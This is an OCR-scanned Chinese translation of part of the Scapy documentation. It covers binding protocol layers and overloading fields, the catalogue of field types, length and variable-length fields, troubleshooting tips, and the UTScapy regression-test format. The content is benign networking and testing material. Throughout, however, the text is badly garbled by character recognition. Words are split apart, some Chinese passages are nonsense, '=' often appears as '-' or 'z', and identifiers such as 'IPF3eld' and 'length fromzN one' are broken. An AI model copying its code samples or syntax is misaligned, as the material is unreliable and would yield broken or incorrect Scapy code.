这 样 的 话 add payload() 该 执行 什么 ?只 是 将 两 个 数据 包 关 联 在 一 起 吗 ? 不 仅仅 
是 这 样 ， 在 我 们 的 例子 中 ， 该 方法 会 适当 的 设置 当前 的 值 给 type ° 


本 能 的 我 们 可 以 感觉 到 上 层 协 议 ( / 右边 的 协议 层 ) 外 区 收集 值 设 置 给 层 协 议 
(/ 左边 的 协议 层 ) 。 看 看 向 前 的 解释 ， 这 有 一 个 方便 的 机 制 来 定 两 个 相 邻 协 
议 层 之 间 的 绑 定 。 


再 一 次 ， 这 些 信 ，， 外 必须 提供 给 bind layer() ， 内 部 将 调 
用 bind top down() 让 这 些 字段 被 重 载 ， 在 这 种 情况 下 ， 我 们 需要 指定 


bind layers( Foo, Bari, {'type':1} ) 
bind layers( Foo, Bar2, {'type':2} ) 


然后 ， add payload() 遍历 上 面 数 据 包 ( payload ) 的 overload fields ,得 到 
这 些 字段 相关 联 的 底层 数据 包 (通过 他 们 的 type ) 并 插入 
到 overloaded fields 。 


现在 ， 当 这 个 字段 的 值 被 请 求 ， getfieldval() 将 返回 插 
到 overloaded fields 中 的 值 。 


字段 被 处 理 有 三 个 方向 : 
e fields : 明确 被 设置 的 字段 值 ， 像 是 pdst 在 TCP 中 是 (pdst='42') 
e overloaded fields : 重 载 字段 


e default fields : 所 有 的 字段 都 是 他 们 的 默认 值 。 (这 些 字段 根 
据 fields_desc 的 初始 化 构造 函数 调用 init fields() ) 


在 下 面 代码 中 ， 我 们 可 以 观察 到 一 个 字段 是 如 何 选择 的 并 且 看 到 他 的 返回 值 


def getfieldval(self, attr): 
for f in self.fields, self.overloaded fields, self.default fi 
elds: 
if f.has key(attr): 
return f[attr] 
return self.payload.getfieldval(attr) 


字段 被 插入 到 fields 有 更 高 的 权限 ， 然 后 是 overloaded fields ^ RE 
是 default fields ， 因 此 如 果 字 上 段 的 type 在 overloaded fields 中 设置 ， 他 
的 值 将 会 被 返回 而 不 是 在 default fields 中 获取 。 


现在 我 们 理解 了 背后 的 所 有 的 魔法 了 ! 


>>> p = Foo()/Bari(val-0x1337) 
>>> p 

«Foo type=1 |<Bar1 val=4919 |>> 
>>> p.show() 
###[ Foo ]### 

type= 1 

len= 4 

sep- '\r\n' 
###[ Bari ]### 

val= 4919 


我 们 的 两 个 问题 都 解决 了 ， 而 没有 发 太 多 的 功夫 。 


理解 底层 : 把 所 有 的 东西 放 在 一 起 
最 后 但 不 是 不 重要 ， 理 解 当 构建 数据 包 的 时 候 每 一 个 函数 什么 时 候 被 调用 是 很 重要 


`x 


I 


>>> hexdump(str(p)) 
Packet.str-Foo 
Packet.iter-Foo 
Packet.iter-Bar1 
Packet.build-Foo 
Packet.build=Bar1 
Packet.post_build=Bar1 
Packet.post build-Foo 


正如 你 所 看 到 的 ， 他 首先 运行 序列 的 每 一 个 字段 ， 然 从 头 开始 构建 ， 一 旦 所 有 的 协 
议 层 构建 好 了 ， 他 们 从 头 开 始 调用 post build() ° 


字段 
这 里 列 出 了 一 些 Scapy 支 持 的 字段 。 


简单 的 数据 类 型 
表示 : 


e LE — 小 端 (默认 是 大 端 ) 
e Signal --- 有 符号 的 (上 默认 是 无 符号 的 ) 


ByteField 
XByteField 


ShortField 
LEShortField 
XShortField 


X3BytesField # three bytes (in hexad 


IntField 
SignedIntField 
LEIntField 
LESignedIntField 
XIntField 


LongField 
XLongField 
LELongField 


IEEEFloatField 
IEEEDoubleField 
BCDFloatField # binary coded decimal 


BitField 
XBitField 


BitFieldLenField # BitField specifying a length (used in RTP) 
FlagsField 
FloatField 


ByteEnumField("code", 4, {1:"REQUEST", 2:"RESPONSE", 3: "SUCCESS", 4 
: "EATLURE"}) 


EnumField(name, default, enum, fmt - "H") 
CharEnumField 

BitEnumField 

ShortEnumField 

LEShortEnumField 

ByteEnumField 

IntEnumField 

SignedIntEnumField 

LEIntEnumField 

XShortEnumField 


TP 


StrField(name, default, fmt="H", remain=0, shift=0) 
StrLenField(name, default, fld=None, length_from=None, shift=0): 
StrFixedLenField 

StrNullField 

StrStopField 


序列 和 定 长 长 度 


FieldList(name, default, field, fld=None, shift=0, length fromzN 
one, count from-None) 

4 A list assembled and dissected with many times the same fiel 
d type 


4 field: instance of the field that will be used to assemble a 
nd disassemble a list item 

# length from: name of the FieldLenField holding the list leng 
th 


FieldLenField 4 holds the list length of a FieldList field 
LEFieldLenField 

LenField # contains len(pkt.payload) 

PacketField 4 holds packets 


PacketLenField # used e.g. in ISAKMP payload Proposal 
PacketListField 


可 变 长 度 字段 


这 是 关于 Scapy 怎 么 处 理 字段 的 可 变 长 度 的 。 这 些 字段 通常 可 以 从 另外 的 字段 那 知 
道 他 们 的 长 度 ， 我 们 称 他 们 为 可 变 字段 和 定 长 字段 。 其 思想 是 让 每 一 个 字段 都 引用 
另 一 个 字段 ， 这 样 当 数 据 包 被 剖析 时 ， 可 变 就 可 以 从 定 长 字段 那 知 道 自己 的 长 度 ， 


如 果 数 据 包 时 被 组 合 的 ， 你 不 必 填 充满 定 长 字段 ， 直 接 可 以 从 可 变 长 度 推测 他 的 
值 。 


问题 出 现在 你 意识 到 可 变 长 度 字 段 和 定 长 字段 之 间 的 关系 并 不 总 是 明确 的 。 有 时 候 
定 长 字段 指示 了 字 节 长 度 ， 有 时 候 是 对 象 的 数量 。 有 时 候 长 度 包含 首 部 部 分 ， 所 以 
你 必须 减 去 固定 的 头 部 长 度 来 推 萌 出 可 变 字段 的 长 度 。 有 时 候 长 度 不 是 以 字 节 而 是 
以 16 位 来 表示 的 ， 有 时 候 相 同 的 不 变 字段 被 两 个 不 同 的 可 变 字段 使 用 ， 有 时 候 相 同 
的 司 变 年 段 下 用 予 同 的 布 可 变 年 得 一 个 是 一 个 年 ^ ee) sP p a 


定 长 字段 


首先 ， 一 个 定 长 字段 是 用 FieldLenField 定 义 的 (或 者 是 他 的 派生 ) 。 当 组 装 数 据 包 
的 时 候 如 果 他 的 值 是 空 ， 他 的 值 将 会 从 引用 他 的 可 变 长 度 字 段 推 倒 出 来 。 引 用 用 了 
其 他 的 length of 参数 或 者 count of 参数 ， count of 参数 只 有 当 可 变 字段 
拥有 一 个 序列 ( PacketListField 或 者 FieldListField ) 的 时 候 才 会 有 意 
义 。 该 值 将 用 可 变 长 度 字 段 命名 ， 作 为 一 个 字符 串 。 根 据 那 个 参数 使 

用 i2len() 或 者 i2count() 方法 将 会 在 不 可 变 字段 值 找 个 调用 。 返 回 的 值 将 会 
被 函数 调整 提供 给 合适 的 参数 。 调 整 将 适用 于 两 个 参数 : izlen() 或 

者 i2count() 返回 的 数据 包 实 例 和 值 。 默 认 情 况 下 ， 调 整 是 不 会 做 什么 事 的 : 


adjust=lambda pkt,x: x 


比如 说 ， 如 果 the varfield 是 一 个 序列 : 


FieldLenField("the lenfield", None, count ofz"the varfield") 


或 者 如 果 他 是 16 位 的 : 


FieldLenField("the lenfield", None, length of="the varfield", ad 
just-lambda pkt,x:(x+1)/2) 


可 变 长 度 字 段 

可 变 长 度 有 : StrLenField , PacketLenField , PacketListField , 
FieldListField ,.. 

这 有 两 个 第 一 ， 当 一 个 数据 包 被 剖析 时 ， 他 们 的 长 度 会 从 已 经 已 经 解析 的 定 长 字段 
长 度 推 到 来 ， 连 接 通 络 使 用 length_from 参 数 ， 应 用 到 一 个 函数 ， 适 用 于 被 解析 的 数 

据 包 的 一 部 分 ， 返 回 一 个 字 节 的 长 度 ， 例 如 : 


StrLenField("the varfield", "the default value", length from = 1 
ambda pkt: pkt.the lenfield) 


或 者 : 


StrLenField("the varfield", "the default value", length from = 1 
ambda pkt: pkt.the lenfield-12) 


对 于 PacketListField 和 FieldListField 和 他 们 的 派生 ， 当 需要 长 度 的 时 
候 ， 工 作 内 容 和 他 们 的 一 样 。 如 果 你 需要 大 量 的 元 素 ， length_from 参数 必须 被 
忽略 并 且 count. from 参数 必须 被 蔡 代 ， 比 如 说 : 


FieldlListField("the_varfield", ["1.2.3.4"], IPF3eld("", "9.0.0.0" 
), count from = lambda pkt: pkt.the lenfield) 


LT — E — wj 
例子 





class TestSLF(Packet): 
fields desc-[ FieldLenField("len", None, length of-'data"), 
StrLenField("data", "", length from-lambda pkt 
:pkt.len) ] 


class TestPLF(Packet): 
fields desc-[ FieldLenField("len", None, count of="plist"), 
PacketListField("plist", None, IP, count from- 
lambda pkt:pkt.len) ] 


class TestFLF(Packet ): 
fields_desc=[ 
FieldLenField("the_lenfield", None, count_of="the_varfiel 
d) 
FieldListField("the varfield", ["1.2.3.4"], IPField("", " 
995070757 


el 


class TestPkt(Packet): 
fields desc = [ ByteField("f1",65), 
ShortField("f2",0x4244) ] 
def extract padding(self, p): 
return "' p 


count from = lambda pkt: pkt.the lenfield 


class TestPLF2(Packet ) : 
fields desc = [ FieldLenField("leni", None, count ofz"plist" 
,fmt-z"H", adjust-lambda pkt,x:x-*2), 
FieldLenField("len2", None, length ofz"plist" 
,fmt="I", adjust=lambda pkt,x:(x+1)/2), 
PacketListField("plist", None, TestPkt, leng 
th from-lambda x:(x.len2*2)/3*3) ] 


El zem 














测试 FieldListField š: 


>>> TestFLF("\x00\xO02ABCDEFGHIJKL" ) 
«TestFLF the lenfield-2 the varfield-['65.66.67.68', '69.70.71. 
72'] |«Raw load='IJKL' |>> 


特殊 的 


Emph # Wrapper to emphasize field when printing, e.g. Emph(I 
PField("dst", "127.0.0.1")), 


ActionField 


ConditionalField(fld, cond) 

# Wrapper to make field 'fld' only appear if 

# function 'cond' evals to True, e.g. 

# ConditionalField(XShortField("chksum",None), lambda pkt 
:pkt.chksumpresent--1) 


PadField(fld, align, padwith=None) 


# Add bytes after the proxified field so that it ends at 
# the specified alignment from its beginning 


TCP/IP 


IPField 
SourcelPField 


IPoptionsField 
TCPOptionsField 


MACField 
DestMACField(MACField) 
SourceMACField(MACField) 
ARPSourceMACField(MACField) 


ICMPTimeStampField 


802.11 


Dot11AddrMACField 
Dot11Addr2MACField 
Dot11Addr3MACField 
Dot11Addr4MACField 
Dot11SCField 


DNS 


DNSStrField 
DNSRRCountField 
DNSRRField 
DNSQRField 
RDataField 
RDLenField 


ASN.1 


ASNA1F element 
ASNAF field 

ASNAF INTEGER 
ASNAF enum INTEGER 
ASNAF STRING 
ASN1F_OID 
ASN1F_SEQUENCE 
ASN1F_SEQUENCE_OF 
ASN1F_PACKET 
ASN1F_CHOICE 


其 他 协议 


NetBIOSNameField 4 NetBIOS (StrFixedLenField) 
ISAKMPTransformSetField # ISAKMP (StrLenField) 


TimeStampField # NTP (BitField) 


常见 问题 


译 者 : 飞龙 
原文 : Troubleshooting 
Wu : CC BY-NC-SA 4.0 


我 的 TCP 连接 被 Scapy 或 者 是 我 的 内 核 重 置 


内 核 不 知道 Scapy 在 他 背后 做 什么 。 如 果 Scapy 发 送 SYN ,目标 回复 SYN- 
ACK， 并 且 你 的 内 核 看 到 它 ， 它 将 回复 RST。 为 了 防止 这 种 情况 ， 请 使 用 本 地 防 
火 墙 规则 (例如 Linux 上 的 NetFilter) ° Scapy 不 介意 本 地 防火 墙 。 


我 Ping 不 通 127.0.0.1，Scapy 在 127.0.0.1 上 或 是 本 
地 回 送 接口 上 不 工作 


回 送 接口 是 一 个 非常 特殊 的 接口 。 通 过 它 的 数据 包 没 有 真正 组 装 和 拆 和 趣 。 内 核 将 
数据 包 路 由 到 其 目的 地 ， 而 它 仍然 存储 于 内 部 结构 中 。 你 看 到 

的 tcpdump -i lo 只 是 假 的 ， 让 你 认为 一 切 正 第 。 内 核 不 知道 Scapy 在 青 后 做 
什么 ， 所 以 你 在 回 送 接口 上 看 到 的 也 是 假 的 。 这 个 是 不 会 在 本 地 结构 中 的 ， 因 此 内 
核 永远 不 会 收 到 它 。 


为 了 和 本 地 的 程序 交流 ， 你 应 该 在 上 层 协 议 中 构建 你 的 数据 包 。 使 
用 PF_INET/SOCK_RAW 套 接 字 而 不 是 PF_PACKET/SOCK_RAW 


>>> conf.L3socket 

«class | main .L3PacketSocket at Oxb7bdf5fc> 

>>> conf.L3socket=L3RawSocket 

>>> sri(IP(dst="127.0.0.1")/ICMP() ) 

«IP version=4L ihl-5L tos=0x0 len-28 id=40953 flags= frag=OL tt 

1-64 proto=ICMP chksum=0xdce5 src-127.0.0.1 dst=127.0.0.1 option 

s='' |«ICMP type=echo-reply code=0 chksum=0xffff id-0xO seq=0x0 
| >> 


BPF 过 滤器 在 PPP 链 路 上 不 能 工作 


这 是 一 个 已 知 的 bug ° BPF 过 滤器 必须 在 PPP 链 路 上 以 不 同 的 偏 移 来 编译 。 如 果 
你 使 用 libpcap (将 用 来 编译 BFP 过 滤器 ) ， 而 不 是 使 用 Linux 本 地 的 支持 
( PF PACKET 套 接 字 ) ， 他 可 能 会 工作 。 


traceroute() 在 PPP 链 路 上 不 能 工作 


这 是 一 个 已 知 的 bug，BPF 过 滤器 在 PPP 链 路 上 不 能 工作 。 
为 了 能 让 他 正常 工作 ， 使 用 nofilter=1 : 


>>> traceroute("target", nofilter-1) 


HAARE?’ FARA? BARA 
快速 修复 : 用 png 格式 


>>> x.graph(format="png") 


更 新 GraphViz 的 最 新 版 本 

尝试 提供 不 同 的 DPI 选项 (上 比如 说 : 50,70,75,96,101,125) 
>>> x.graph(options="-Gdpi=70") 

如 果 它 工作 了 ， 你 可 以 永久 设置 它 : 


>>> conf.prog.dot = "dot -Gdpi=70" 
你 也 可 以 将 这 一 行 放 在 你 的 -/.scapy startup.py 文件 中 。 


获取 帮助 
常见 问题 都 在 FAQ 中 。 


在 scapy.ml(at)secdev. org (274 > RSS > NNTP) 上 有 一 个 低 流 量 邮 件 列 
表 。 RU Ee 问题 ， 错 误 报告 ， 建 议 ， 想 法 ，Scapy 的 有 趣 用 法 
等 。 通 过 发 送 邮件 到 scapy.ml-subscribe(at)secdev.org 来 订阅 。 


为 了 避免 垃圾 邮件 ， 你 必须 订阅 邮件 列表 才能 发 布 。 


Scapy 开发 


译 者 : 飞龙 
原文 : Scapy development 
协议 : CC BY-NC-SA 4.0 


项 目 组 织 


Scapy 开发 使 用 Mercurial 版 本 控制 系统 。Scapy 的 参考 资料 库 位 于 
http://ng.secdev.org/scapy/ ° 


项 目 管理 由 Trac 完成 。 Trac 在 Scapy 的 参考 资料 库 中 工作 。 它 提 供 了 一 个 可 以 
自由 编辑 的 Wiki (请 贡献 |) ， 可 以 引用 项 目的 ticket? ER> CH CARE 
了 一 个 ticket 管理 服务 ， 用 于 避免 遗忘 补丁 或 错误 。 


Mercurial 的 分 布 式 工作 方式 使 Philippe 可 提供 两 个 仓库 ， 任 何人 都 可 以 提交 : 
Scapy 社区 仓库 和 Scapy Windows 端口 仓库 。 


如 何 页 献 


e 在 Scapy 中 发 现 了 一 个 错误 ?添加 ticket ° 

e 改进 此 文档 。 

° 编写 一 个 新 的 协议 层 ， 并 在 邮件 列表 上 分 享 。 或 者 在 bugtracker 上 将 其 添加 为 
改进 。 

e 贡献 新 的 回归 测试 。 

e 在 封包 样 例 页 面 上 为 新 协议 上 传 封 包 样 例 。 


使 用 UTScapy 测试 


什么 是 UTScapy ? 


UTScapy 是 一 个 小 型 Python 程序 ， 它 读 取 测 试 活动 ， 使 用 Scapy 运行 活动 ， 并 生 
成 一 个 指示 测试 状态 的 报告 。 报 告 可 以 是 四 种 格式 之 一 ， 即 text，ansi，HTML 或 
LaTeX ° 


UTScapy 存在 三 个 基本 测试 容器 ， 单 元 测试 ， 测 试 集 和 测试 活动 。 单 元 测试 是 
Scapy 命令 列表 ， 由 Scapy X Scapy 的 派生 作品 运行 。 在 单元 测试 中 最 后 一 个 命 
令 的 评估 ， 将 确定 单个 单元 测试 的 最 终结 果 。 测 试 集 是 一 组 具有 某 种 关联 的 单元 测 
试 。 测 试 活动 由 一 或 多 个 测试 集 组 成 。 测 试 集 和 单元 测试 可 以 被 赋予 关键 字 来 形成 
逻辑 分 组 。 运 行 测 试 活 动 时 ， 可 以 按 关键 字 选 择 测 试 。 这 人 允许 用 户 在 期 望 的 分 组 内 
运行 测试 。 


对 于 每 个 单元 测试 ， 测 试 集 和 活动 ， 测 试 的 CRC32 被 计算 并 显示 为 该 测试 的 签 
名 。 该 测试 签名 足以 确定 实际 测试 按 预 期 运行 而 没有 修改 。 如 果 你 遇 到 的 一 些 恶 意 
用 户 ， 试 图 修改 或 损坏 文件 ， 而 不 改变 CRC32， 全 局 SHA1 会 在 整个 文件 计算 。 


活动 的 语法 


表 1 显示 了 UTScapy 正在 寻找 的 语法 指标 。 在 定义 测试 的 文本 文件 的 每 一 行 中 ， 
语法 限定 符 必 须 是 第 一 个 字符 。 由 UTScapy 解释 的 参数 是 遵循 语法 限定 符 的 文本 
描述 。 在 没有 前 导语 法 限定 符 的 情况 下 出 现 的 行将 被 视 为 Python 命令 ， 前 提 是 它 
们 出 现在 单元 测试 的 上 下 文中 。 没有 语法 限定 符 ， 并 出 现在 正确 上 下 文 之 外 的 行将 
被 UTScapy 拒绝 ， 并 且 将 发 出 警告 。 


语法 限定 符 定义 
% 提供 测试 活动 的 名 称 
+ 声明 新 的 测试 集 
= 声明 新 的 单元 测试 
- 为 当前 单元 测试 声明 关键 字 
表示 需要 在 报告 中 包含 的 注释 
# 测试 用 例 的 注解 ， 会 被 解释 器 忽略 


£ 1-UTScapy 语法 限定 符 


在 测试 报告 中 的 注释 有 一 个 上 下 文 。 每 个 注释 将 与 最 后 定义 的 测试 容器 相关 联 - 这 
是 单个 单元 测试 ， 测 试 集 或 测试 活动 。 与 特定 容器 相关 联 的 多 个 注释 将 连接 在 一 

起 ， 并 将 直接 显示 在 测试 容器 声明 后 的 报告 中 。 在 声明 测试 活动 之 前 ， 应 该 会 显示 
测试 文件 的 一 般 注 释 。 对 于 与 测试 活动 相关 联 的 注释 ， 它 们 必须 位 于 声明 测试 活动 
之 后 ， 但 在 任何 测试 集 或 单元 测试 之 前 出 现 。 测试 集 的 注释 应 在 集合 的 第 一 个 单元 
测试 的 定义 之 前 出 现 。 


测试 活动 的 通用 格式 如 下 表 所 示 : 


Se 


Test Campaign Name 
* Comment describing this campaign 


+ 


Test Set 1 
comments for test set 1 


* 


- Unit Test 1 

~ keywords 

* Comments for unit test 1 
# Python statements follow 
a-1 

print a 

a == 1 


Python 语句 由 缺少 定义 的 UTScapy 语法 限定 符 来 标识 。 Python 语句 直接 提供 给 
Python 解释 器 ， 就 像 在 交互 式 Scapy shell (交互 ) 中 操作 一 样 。 循 环 ， 迭 代 和 条 
件 是 允许 的 ， 但 必须 以 空 行 终止 。 测 试 集 可 以 包括 多 个 单元 测试 ， 并 且 可 以 为 每 个 
活动 定义 多 个 测试 集 。 基 至 可 以 在 特定 测试 定义 文件 中 包含 多 个 测试 活动 。 使 用 关 
键 字 可 以 测试 整个 活动 的 子 集 。 例 如 ， 在 测试 活动 的 开发 期 间 ， 用 户 可 能 希望 使 用 
关键 词 “debug” 来 标记 正在 开发 的 新 测试 。 一 旦 测试 成 功 运行 出 他 们 想 要 的 结果 ， 
关键 字 “debug” 可 以 被 删除 。 也 可 以 使 用 诸如 “regression” 或 jimited” 的 关键 词 。 
重要 的 是 要 注意 ，UTScapy 使 用 来 自 最 后 一 个 Python 语句 的 真 值 作为 测试 是 通过 
还 是 失败 的 指示 符 。 最 后 一 行 可 能 出 现 多 个 逻辑 测试 。 如 果 结 果 为 0 或 False ， 
则 测试 失败 。 否 则 ， 测 试 通过 。 如 果 需 要 ， 使 用 assert() 3&4] T YA m] F B] 4& 83 
求 值 


UTScapy 的 语法 如 表 3 所 示 - UTScapy 命令 行 语法 : 


[root@localhost scapy]# ./UTscapy.py -h 
Usage: UTscapy [-m module] [-f {text]ansi]HTML|LaTexX}] [-o outpu 
t file] 

[-t testfile] [-k keywords [-k ...]] [-K keywords 


[-K ...]] 
[-1] [-d|-D] [-F] [-q[q]] 
-1 : generate local files 
-F : expand only failed tests 
-d : dump campaign 
-D : dump campaign and stop 
-C : don't calculate CRC and SHA 
-q : quiet mode 
-qq : [Silent mode] 
-n <testnum> : only tests whose numbers are given (eg. 1,3-7, 
12) 
-m «module» : additional module to put in the namespace 
-k <kwi>,<kw2>,... : include only tests with one of those k 
eywords (can be used many times) 
-K <kwi>,<kw2>,... : remove tests with one of those keyword 


S (can be used many times) 


£ 3 - UTScapy 命令 行 语法 


所 有 参数 都 是 可 选 的 。 没有 相关 联 的 参数 值 的 参数 可 以 串 在 一 起 (FP -1qF ) ° 
如 果 未 指定 测试 文件 ， 则 测试 定义 来 自 <STDIN> ° 类 似 地 ， 如 果 没 有 指定 输出 文 
件 ， 则 它 被 定向 到 <STDOUT> ° 默认 输出 格式 为 “ansi”。 表 4 列 出 了 和 参数， 相关 
联 的 参数 值 及 其 对 UTScapy 的 含义 。 


参数 值 
数 数值 
zt testfile 


-O output_file 


-f test 


-N testnum 


module 


-k kw1, kw2, 
-K kw1, kw2, 


& 4 - UTScapy 参数 


对 UTScapy 的 含义 


定义 测试 活动 的 测试 文件 (默认 为 <STDIN> ) 
测试 活动 结果 的 输出 文件 (默认 为 <STDOUT> ) 


ansi ^ HTML ^ LaTeX ， 输 出 报告 的 格式 ( 默 
1. ansi ) 


在 本 地 生成 报告 的 相关 文件 。 对 于 HTML， 生 成 
JavaScript 和 样式 表 


默认 情况 下 ， 失 败 的 测试 用 例会 在 HTML 输出 中 展 
开 


在 执行 活动 之 前 打印 测试 活动 的 简短 列表 。 
打印 测试 活动 的 简短 列表 并 停止 。 不 执行 测试 活 
Alo 

不 要 计算 测试 签名 

在 测试 执行 时 ， 不 要 在 屏幕 上 显示 测试 流程 


静默 模式 


RENE 文 些 测试 。 测试 编号 可 以 使 

-d 或 -D 来 获取 。 测 试 可 以 使 用 以 各 号 分 隔 的 
Ae ee ， 并且 可 以 包含 范围 (例如 1, 3-7, 
12) » 


在 执行 测试 之 前 加 载 模块 。 使 用 Scapy 的 派生 作品 
来 测试 。 注 意 : 要 作为 _ main 执行 的 派生 作品 
不 会 被 UTScapy 作为 main _ 调用 。 


包含 带 有 关键 字 kwl 的 测试 ， 可 以 指定 多 个 关键 


wu 
JN 
=> 


4y 


排除 带 有 关键 字 kwi 的 测试 ， 可 以 指定 多 个 关键 


表 5 显示 了 具有 多 个 测试 集 定义 的 简单 测试 活动 。 此 外 ， 关 键 字 指定 了 仅 允 许 执行 
有 限 数量 的 测试 用 例 。 注意 在 测试 3 和 5 中 使 用 assert() 语句 来 检查 中 间 结 
果 。 测 试 2 和 5 为 失败 而 设计 。 


% Example Test Campaign 


# Comment describing this campaign 


# 


# To run this campaign, try: 

# ./UTscapy.py -t example campaign.txt -f html -o example camp 
aign.html -F 

# 


* This comment is associated with the test campaign and will app 
ear 
* in the produced output. 


+ Test Set 1 


Unit Test 1 

~ test_set_1 simple 
a-1 

print a 


Unit test 2 
test set 1 simple 
this test will fail 


° O * 1 
II 
N 


= Unit test 3 

— test set 1 harder 
a = 1 

b-2 

c - "hello" 

assert (a !- b) 

c -- "hello" 


* Test Set 2 


= Unit Test 4 
test set 2 harder 


Unit Test 5 

~ test set 2 harder hardest 

zo 

2.9 

= 

= (a * b)**d 

The following statement evaluates to False but is not last; co 
ntinue 


d Doo» 


e == 

# assert evaluates to False; stop test and fail 
assert (e == 7) 

e == 1296 


Unit Test 6 
— test set 2 hardest 


print e 
e == 1296 


为 了 查看 以 Scapy 为 目标 的 示例 ， 请 访问 
http://www.secdev.org/projects/UTscapy。 将 页 面 底部 的 示例 复制 粘贴 到 文 
件 demo campaign.txt ， 并 对 它 运行 UTScapy : 


./UTscapy.py -t demo campaign.txt -f html -o demo campaign.html 
-F -1 


在 文件 demo campaign.html 中 检测 生成 的 结果 。 


